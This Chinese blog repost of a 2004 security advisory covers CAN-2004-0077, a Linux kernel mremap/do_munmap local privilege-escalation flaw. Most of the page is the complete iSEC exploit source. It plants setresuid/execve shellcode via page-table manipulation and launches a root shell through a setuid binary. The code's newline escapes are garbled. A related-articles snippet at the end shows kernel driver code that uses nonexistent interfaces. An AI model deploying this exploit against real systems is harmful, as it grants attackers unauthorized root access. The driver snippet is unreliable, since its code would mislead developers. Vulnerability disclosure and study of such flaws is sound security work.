Linux Kernel do_mremap VMA本地权限提升漏洞

最新推荐文章于 2023-09-07 10:07:48 发布
最新推荐文章于 2023-09-07 10:07:48 发布
阅读量1.2k 收藏
点赞数
分类专栏: *IX和BSD系統 文章标签: linux linux内核 printing redhat suse debian
Linux Kernel do_mremap VMA本地权限提升漏洞

日期:2004-03-05

发布日期:2004-02-18
更新日期:2004-03-03

受影响系统:
Linux kernel 2.6.2
Linux kernel 2.6.1
Linux kernel 2.6
Linux kernel 2.4.9
Linux kernel 2.4.8
Linux kernel 2.4.7
Linux kernel 2.4.6
Linux kernel 2.4.5
Linux kernel 2.4.4
Linux kernel 2.4.3
Linux kernel 2.4.24
Linux kernel 2.4.23
Linux kernel 2.4.22
Linux kernel 2.4.21
Linux kernel 2.4.20
Linux kernel 2.4.2
Linux kernel 2.4.19
Linux kernel 2.4.17
Linux kernel 2.4.16
Linux kernel 2.4.15
Linux kernel 2.4.14
Linux kernel 2.4.13
Linux kernel 2.4.12
Linux kernel 2.4.11
Linux kernel 2.4.10
Linux kernel 2.4.1
Linux kernel 2.4
Linux kernel 2.2.9
Linux kernel 2.2.8
Linux kernel 2.2.7
Linux kernel 2.2.6
Linux kernel 2.2.5
Linux kernel 2.2.4
Linux kernel 2.2.3
Linux kernel 2.2.25
Linux kernel 2.2.24
Linux kernel 2.2.23
Linux kernel 2.2.22
Linux kernel 2.2.21
Linux kernel 2.2.20
Linux kernel 2.2.2
Linux kernel 2.2.19
Linux kernel 2.2.18
Linux kernel 2.2.17
Linux kernel 2.2.16
Linux kernel 2.2.15
Linux kernel 2.2.14
Linux kernel 2.2.13
Linux kernel 2.2.12
Linux kernel 2.2.11
Linux kernel 2.2.10
Linux kernel 2.2.1
Linux kernel 2.2
Linux kernel 2.4.18
    - Conectiva Linux 8.0
    - Conectiva Linux 7.0
    - Debian Linux 3.0
    - Mandrake Linux 8.2
    - Mandrake Linux 8.1
    - RedHat Linux 8.0
    - RedHat Linux 7.3
    - Slackware Linux 8.1
    - Slackware Linux 8.0
    - SuSE Linux 8.2
    - SuSE Linux 8.1
不受影响系统:
Linux kernel 2.6.3
Linux kernel 2.4.25
Linux kernel 2.2.26
描述:
--------------------------------------------------------------------------------
CVE(CAN) ID: CAN-2004-0077

Linux是一款开放源代码操作系统。

Linux内核中mremap(2)系统调用由于没有对函数返回值进行检查,本地攻击者可以利用这个漏洞获得root用户权限。

mremap系统调用被应用程序用来改变映射区段(VMAs)的边界地址。mremap()系统调用提供对已存在虚拟内存区域调整大小。从VMA区域移动部分虚拟内存到新的区域需要建立一个新的VMA描述符,也就是把由VMA描述的下面的页面表条目(page table entries)从老的区域拷贝到进程页表中新的位置。

要完成这个任务do_mremap代码需要调用do_munmap()内部内核函数去清除在新位置中任何已经存在的内存映射,也就是删除旧的虚拟内存映射。不幸的是代码没有对do_munmap()函数的返回值进行检查,如果可用VMA描述符的最大数已经超出,那么函数调用就可能失败。

isec利用这个漏洞通过页表缓冲(page table cache)使包含在页中的恶意指令被执行。详细方法可参看如下地址:

http://isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt

<*来源:Paul Starzetz (paul@starzetz.de)
  
  链接:http://isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Paul Starzetz (paul@starzetz.de)提供了如下测试方法:

/*
*
*    mremap missing do_munmap return check kernel exploit
*
*    gcc -O3 -static -fomit-frame-pointer mremap_pte.c -o mremap_pte
*    ./mremap_pte [suid] [[shell]]
*
*    Copyright (c) 2004  iSEC Security Research. All Rights Reserved.
*
*    THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
*    AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
*    WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <unistd.h>
#include <syscall.h>
#include <signal.h>
#include <time.h>
#include <sched.h>

#include <sys/mman.h>
#include <sys/wait.h>
#include <sys/utsname.h>

#include <asm/page.h>


#define str(s) #s
#define xstr(s) str(s)

//    this is for standard kernels with 3/1 split
#define STARTADDR    0x40000000
#define PGD_SIZE    (PAGE_SIZE * 1024)
#define VICTIM        (STARTADDR + PGD_SIZE)
#define MMAP_BASE    (STARTADDR + 3*PGD_SIZE)

#define DSIGNAL        SIGCHLD
#define CLONEFL        (DSIGNAL|CLONE_VFORK|CLONE_VM)

#define MREMAP_MAYMOVE    ( (1UL) << 0 )
#define MREMAP_FIXED    ( (1UL) << 1 )

#define __NR_sys_mremap    __NR_mremap


//    how many ld.so pages? this is the .text section length (like from cat    
//    /proc/self/maps) in pages
#define LINKERPAGES    0x14

//    suid victim
static char *suid="/bin/ping";

//    shell to start
static char *launch="/bin/bash";


_syscall5(ulong, sys_mremap, ulong, a, ulong, b, ulong, c, ulong, d,        
      ulong, e);
unsigned long sys_mremap(unsigned long addr, unsigned long old_len,
             unsigned long new_len, unsigned long flags,
             unsigned long new_addr);

static volatile unsigned base, *t, cnt, old_esp, prot, victim=0;
static int i, pid=0;
static char *env[2], *argv[2];
static ulong ret;


//    code to appear inside the suid image
static void suid_code(void)
{
__asm__(
    "        call    callme                /n"

//    setresuid(0, 0, 0), setresgid(0, 0, 0)
    "jumpme:    xorl    %ebx, %ebx            /n"
    "        xorl    %ecx, %ecx            /n"
    "        xorl    %edx, %edx            /n"
    "        xorl    %eax, %eax            /n"
    "        mov    $"xstr(__NR_setresuid)", %al    /n"
    "        int    $0x80                /n"
    "        mov    $"xstr(__NR_setresgid)", %al    /n"
    "        int    $0x80                /n"

//    execve(launch)
    "        popl    %ebx                /n"
    "        andl    $0xfffff000, %ebx        /n"
    "        xorl    %eax, %eax            /n"
    "        pushl    %eax                /n"
    "        movl    %esp, %edx            /n"
    "        pushl    %ebx                /n"
    "        movl    %esp, %ecx            /n"
    "        mov    $"xstr(__NR_execve)", %al    /n"
    "        int    $0x80                /n"

//    exit
    "        xorl    %eax, %eax            /n"
    "        mov    $"xstr(__NR_exit)", %al        /n"
    "        int    $0x80                /n"

    "callme:    jmp    jumpme                /n"
    );
}


static int suid_code_end(int v)
{
return v+1;
}


static inline void get_esp(void)
{
__asm__(
    "        movl    %%esp, %%eax            /n"
    "        andl    $0xfffff000, %%eax        /n"
    "        movl    %%eax, %0            /n"
    : : "m"(old_esp)
    );
}


static inline void cloneme(void)
{
__asm__(
    "        pusha                    /n"
    "        movl $("xstr(CLONEFL)"), %%ebx        /n"
    "        movl %%esp, %%ecx            /n"
    "        movl $"xstr(__NR_clone)", %%eax        /n"
    "        int  $0x80                /n"
    "        movl %%eax, %0                /n"
    "        popa                    /n"
    : : "m"(pid)
    );
}


static inline void my_execve(void)
{
__asm__(
    "        movl %1, %%ebx                /n"
    "        movl %2, %%ecx                /n"
    "        movl %3, %%edx                /n"
    "        movl $"xstr(__NR_execve)", %%eax    /n"
    "        int  $0x80                /n"
    : "=a"(ret)
    : "m"(suid), "m"(argv), "m"(env)
    );
}


static inline void pte_populate(unsigned addr)
{
unsigned r;
char *ptr;

    memset((void*)addr, 0x90, PAGE_SIZE);
    r = ((unsigned)suid_code_end) - ((unsigned)suid_code);
    ptr = (void*) (addr + PAGE_SIZE);
    ptr -= r+1;
    memcpy(ptr, suid_code, r);
    memcpy((void*)addr, launch, strlen(launch)+1);
}


//    hit VMA limit & populate PTEs
static void exhaust(void)
{
//    mmap PTE donor
    t = mmap((void*)victim, PAGE_SIZE*(LINKERPAGES+3), PROT_READ|PROT_WRITE,
          MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
    if(MAP_FAILED==t)
        goto failed;

//    prepare shell code pages
    for(i=2; i<LINKERPAGES+1; i++)
        pte_populate(victim + PAGE_SIZE*i);
    i = mprotect((void*)victim, PAGE_SIZE*(LINKERPAGES+3), PROT_READ);
    if(i)
        goto failed;

//    lock unmap
    base = MMAP_BASE;
    cnt = 0;
    prot = PROT_READ;
    printf("/n"); fflush(stdout);
    for(;;) {
        t = mmap((void*)base, PAGE_SIZE, prot,
             MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
        if(MAP_FAILED==t) {
            if(ENOMEM==errno)
                break;
            else
                goto failed;
        }
        if( !(cnt%512) || cnt>65520 )
            printf("/r    MMAP #%d  0x%.8x - 0x%.8lx", cnt, base,
            base+PAGE_SIZE); fflush(stdout);
        base += PAGE_SIZE;
        prot ^= PROT_EXEC;
        cnt++;
    }

//    move PTEs & populate page table cache
    ret = sys_mremap(victim+PAGE_SIZE, LINKERPAGES*PAGE_SIZE, PAGE_SIZE,    
             MREMAP_FIXED|MREMAP_MAYMOVE, VICTIM);
    if(-1==ret)
        goto failed;

    munmap((void*)MMAP_BASE, old_esp-MMAP_BASE);
    t = mmap((void*)(old_esp-PGD_SIZE-PAGE_SIZE), PAGE_SIZE,        
         PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0,
         0);
    if(MAP_FAILED==t)
        goto failed;

    *t = *((unsigned *)old_esp);
    munmap((void*)VICTIM-PAGE_SIZE, old_esp-(VICTIM-PAGE_SIZE));
    printf("/n[+] Success/n/n"); fflush(stdout);
    return;

failed:
    printf("/n[-] Failed/n"); fflush(stdout);
    _exit(0);
}


static inline void check_kver(void)
{
static struct utsname un;
int a=0, b=0, c=0, v=0, e=0, n;

    uname(&un);
    n=sscanf(un.release, "%d.%d.%d", &a, &b, &c);
    if(n!=3 || a!=2) {
        printf("/n[-] invalid kernel version string/n");
        _exit(0);
    }

    if(b==2) {
        if(c<=25)
            v=1;
    }
    else if(b==3) {
        if(c<=99)
            v=1;
    }
    else if(b==4) {
        if(c>18 && c<=24)
            v=1, e=1;
        else if(c>24)
            v=0, e=0;
        else
            v=1, e=0;
    }
    else if(b==5 && c<=75)
        v=1, e=1;
    else if(b==6 && c<=2)
        v=1, e=1;

    printf("/n[+] kernel %s  vulnerable: %s  exploitable %s",
        un.release, v? "YES" : "NO", e? "YES" : "NO" );
    fflush(stdout);

    if(v && e)
        return;
    _exit(0);
}


int main(int ac, char **av)
{
//    prepare
    check_kver();
    memset(env, 0, sizeof(env));
    memset(argv, 0, sizeof(argv));
    if(ac>1) suid=av[1];
    if(ac>2) launch=av[2];
    argv[0] = suid;
    get_esp();

//    mmap & clone & execve
    exhaust();
    cloneme();
    if(!pid) {
        my_execve();
    } else {
        waitpid(pid, 0, 0);
    }

return 0;
}
 
iiprogram
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
linux内核那些事之 VMA Gap
weixin_42730667的博客
08-23 710
rb_subtree_gap kernel为了提高对VMA 查找、插入速度,采用了很多技术,例如VMA采用RB tree和 双向链表两种组织形式,另外对VMA结构对cache line对齐从而提高cache命中率等。由于内存在实际使用过程中,不断的申请释放,使得原来成片的连续内存空间变成了一段段不连续空间,每个VMA都存在一定空闲空间即gap: 在查找GAP时,一般为了知道GAP大小,需要知道前一个VMA prev的end地址和当前VMA的start地址即GAP=vma->start-..
C realloc based on Linux mremap [efficiency]
修也
07-12 245
Linux 提供 mremap()系统调用来扩大或者缩小指定映射的大小,这个函数是 Linux 系统 特有的: #define _GNU_SOURCE #include <unistd.h> #include <sys/mman.h> void * mremap (void *addr, size_t old_size, size_t new_size, unsigned long flags); ibc 库使用 mremap()来实现高效的 realloc(),这是一个重新调.
linux msgctl函数,mremap()函数 Unix/Linux
weixin_29599245的博客
05-07 325
mremap -重新映射的虚拟内存地址内容简介#define _GNU_SOURCE#include #include void * mremap(void *old_address, size_told_size, size_tnew_size, intflags);描述mremap()扩大(或缩小)现有的内存映射,潜在的移动它在同一时间(由flags参数和可用的虚拟地址空间控制)。old_a...
Linux文件内存映射 mmap、msync、mremap
陈子青的博客
12-13 3964
原链接:Linux文件内存映射 文件内存映射 文件映射的应用场景 进程间共享信息 实现文件数据从磁盘到内存的映射,极大的提升应用程序访问文件的速度 mmap函数 头文件:#include<sys/mman.h> 函数原型: void *mmap(void *addr, size_t length, int port, int flags,int fd, off_t offset); int munmap(void *addr, size_t length); 参数:
mremap()
weixin_41540614的博客
12-14 2711
mremap() 扩大/缩小现有内存映射,flags参数还可以控制??? #define_GNU_SOURCE #include<unistd.h> #include<sys/mman.h> void * mremap(void *old_address, size_t old_size , size_t new_size, int flags.../* void *new_address */); 参数 old_address:旧地址已经被page aligned页对齐 o
linux-DirtyCOW
08-13
1. 漏洞存在于`mm/vmscan.c`文件的`do_mremap()`函数中。 2. 当有进程尝试修改一个只读内存映射区域时,如果没有进行复制,内核将错误地将该区域标记为可写,导致数据被非法修改。 3. 为了触发此漏洞,攻击者需要...
Linux的系统调用实现机制与系统调用实例分析-Jin-Yang.pdf
08-24
"Linux 系统调用实现机制与系统调用实例分析" 一、系统调用概述 系统调用是操作系统中必不可少的一个组成部分,对于以该操作系统作为平台进行程序设计的程序员来说,系统调用提供了该系统面向用户的编程界面,程序...
memory leakge & initialization & invalid pointer
11-27
- **Solution 2**: Use structured exception handling patterns such as `do {} while(0)` to manage memory allocation and deallocation effectively. **1.3 Who Allocates, Who Frees** - **Problem**: When ...
mapguard:MapGuard是一个针对基于mmap的页面分配强制实施安全策略的库
05-07
Map Guard是一种概念验证的内存代理,旨在通过拦截,修改和记录基于mmap的页面分配来减轻内存安全漏洞。 它实施了一组可通过环境变量配置的简单分配安全策略。 它在打开和关闭的源程序上透明地工作,而无需在目标中...
flexdecrypt:解密iOS应用和Mach-O二进制文件
03-19
使用mremap_encrypted从磁盘解密文件。 安装 从下载.deb软件包 将其传输到您的设备。 使用Filza通过UI进行安装,或使用命令行: dpkg -i flexdecrypt.deb 如果您使用的是iOS 12.1或更低版本,请直接使用dpkg并收到...
linux内核那些事之VMA常用操作
weixin_42730667的博客
08-16 2447
内核对vm_area_struct 数据结构相关操作进行了一系列封装,方面进行后续操作,vma的操作实现大部分位于mm\mmap.c文件中 find_vma() find_vma()是内核中经常需要查找某个给定的虚拟地址是否已经分配,源代码如下: /* Look up the first VMA which satisfies addr < vm_end, NULL if none. */ struct vm_area_struct *find_vma(struct mm_struct
Unix/Linux编程:内存映射------mmap()系列函数
OceanStar的博客
04-20 1008
概述 mmap()系统调用在调用进程的虚拟地址空间中创建一个新内存映射。映射分为两种: 文件映射: 文件映射将一个文件的一部分直接映射到调用进程的虚拟内存中。 一旦一个文件被映射之后就可以通过在相应的内存区域中操作字节来访问文件内容了(即对文件映射内容的访问则转换为对相应内存区域的字节操作)。映射的分页会在需要的时候自动从文件中加载。这种映射也被称为基于文件的映射或者内存映射文件。 匿名映射(与文件无关): 这种映射没有对应的文件,其映射页面的内容会被初始化为0 可以把匿名映射看成是一个内容总是被
Linux内核漏洞(权限提升)实例
weixin_34226706的博客
06-14 267
这个内核漏洞相当的严重,只要用户拥有本地用户的权限便可以轻松的获取到管理员的权了。 下图为我在自己的服务器上做的测试,果然针对目前绝大多数的linux内核漏洞! 修复方法: 一、如果您使用的是RedHa tEnterprise Linux 4/5的系统或Centos4/5的系统,您可以通过下面的操作简单的操作防止被***。 在/etc/modpro...
嵌入式学习(内存管理)
qq_40976784的博客
06-15 862
需要注意的是,使用munmap函数释放的内存区域不能再次访问,否则会导致程序出现不可预知的行为。另外,使用munmap函数释放的内存区域必须是使用mmap函数映射的内存区域,否则导致程序出现错误。mmap函数的使用可以提高文件的访问速度,减少内存的使用,提高程序的性能。另外,munlock函数只能解锁先前由mlock函数锁定的内存区域,如果一个内存区域没有被锁定,调用munlock函数也会失败。函数是一个Linux系统调用,用于重新映射一个已经映射的内存区域,可以用来改变内存区域的大小或位置。
内存管理和内存映射MMAP和DMA详解
最新发布
office_lgirl的博客
09-07 1000
介绍Linux内存管理和内存映射的奥秘。同时讲述设备驱动程序是如何使用“直接内存访问”(DMA)的。尽管可能认为DMA更属于硬件处理而不是软件接口,但与硬件控制比起来,它与内存管理更相关。大多数驱动程序并不需要太深入到系统内部。不过理解内存如何工作可以帮助在设计驱动程序时有效地利用系统的能力。
Linux 进程通讯 - 共享内存机制
cpp_learner的博客
04-25 1003
详细介绍共享内存机制中用到的函数,且有相关例子!
linux 内存管理
04-07 4222
目录 1Linux内存管理概述 1.1 内存的层次结构 1.2 虚拟内存概述 1.2.1 虚拟内存基本思想 1.2.2 进程虚拟地址空间 1.3 内核空间到物理空间的映射 1.3.1 内核空间的线性映射 1.3.2 内核镜像的物理存储 1.4 虚拟内存实现机制 2进程用户空间管理 2.1 进程用户空间布局 2.2 进程用户空间的内核描述 2.2.1 概述 2.2.2 mm_struct 结构 2.2.3 vm_area_struct 结构 2.2.4 实例:内核态打印虚存..
linux内核源码分析之虚拟内存映射
04-30 1854
目录 内存映射原理 系统调用 mmap内存映射原理三个阶段 sys_mmap函数调用 munmap系统调用 内存映射即在进程的虚拟内存地址空间中创建一个映射,分为两种 1)文件映射:文件支持的内存映射,把文件的一个区间映射到进程的虚拟地址空间,数据源是存储设备上的文件。 2)匿名映射:没有文件支持的内存映射,把物理内存映射到进程的虚拟地址空间,没有数据源。 内存映射原理 创建内存映射时,在进程的用户虚拟地址空间中分配一个虚拟内存区域。内核采用延迟分配物理内存的策略,在进程第一次访问虚
请给出响应用户mremap系统调用的内核内核驱动程序实例
05-26
下面是一个响应mremap系统调用的内核驱动程序示例: ```c #include <linux/module.h> #include <linux/kernel.h> #include <linux/mm.h> #include <linux/mman.h> #include <linux/fs.h> #include <linux/slab.h> #include <linux/uaccess.h> #include <linux/version.h> MODULE_LICENSE("GPL"); MODULE_AUTHOR("Your Name"); MODULE_DESCRIPTION("mremap driver"); static int my_mremap(struct file *filep, struct vm_area_struct *vma, unsigned long old_addr, unsigned long old_size, unsigned long new_addr, unsigned long new_size) { int ret = 0; struct page *page = NULL; if (new_size > old_size) { // Expand memory mapping unsigned long npages = (new_size - old_size) >> PAGE_SHIFT; while (npages-- > 0) { page = alloc_page(GFP_KERNEL); if (!page) { printk(KERN_ERR "Failed to allocate page\n"); ret = -ENOMEM; goto out; } ret = vm_insert_page(vma, new_addr + old_size, page); if (ret < 0) { printk(KERN_ERR "Failed to insert page\n"); __free_page(page); goto out; } old_size += PAGE_SIZE; } } else if (new_size < old_size) { // Shrink memory mapping unsigned long npages = (old_size - new_size) >> PAGE_SHIFT; while (npages-- > 0) { page = vmalloc_to_page((void *) new_addr + new_size); if (!page) { printk(KERN_ERR "Failed to get page\n"); ret = -EFAULT; goto out; } ret = vm_delete_page(vma, new_addr + new_size, page); if (ret < 0) { printk(KERN_ERR "Failed to delete page\n"); goto out; } __free_page(page); old_size -= PAGE_SIZE; } } // Update memory mapping vma->vm_end = new_addr + new_size; vma->vm_pgoff = new_addr >> PAGE_SHIFT; out: return ret; } static const struct file_operations fops = { .mremap = my_mremap, }; static int __init mremap_init(void) { int ret = 0; ret = register_chrdev(0, "mremap", &fops); if (ret < 0) { printk(KERN_ERR "Failed to register device\n"); goto out; } printk(KERN_INFO "mremap driver loaded\n"); out: return ret; } static void __exit mremap_exit(void) { unregister_chrdev(0, "mremap"); printk(KERN_INFO "mremap driver unloaded\n"); } module_init(mremap_init); module_exit(mremap_exit); ``` 以上代码中,我们定义了一个my_mremap()函数来处理mremap系统调用。在这个函数中,我们首先检查新的映射大小是否比旧的映射大小大,如果是,则分配新的页面,并将它们插入到内存映射区域中。如果新的映射大小比旧的映射大小小,则删除不再需要的页面。 最后,我们更新内存映射区域的大小和页偏移,并返回适当的错误代码。我们将这个函数作为file_operations结构体的mremap字段的值,以便内核可以调用它来处理mremap系统调用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值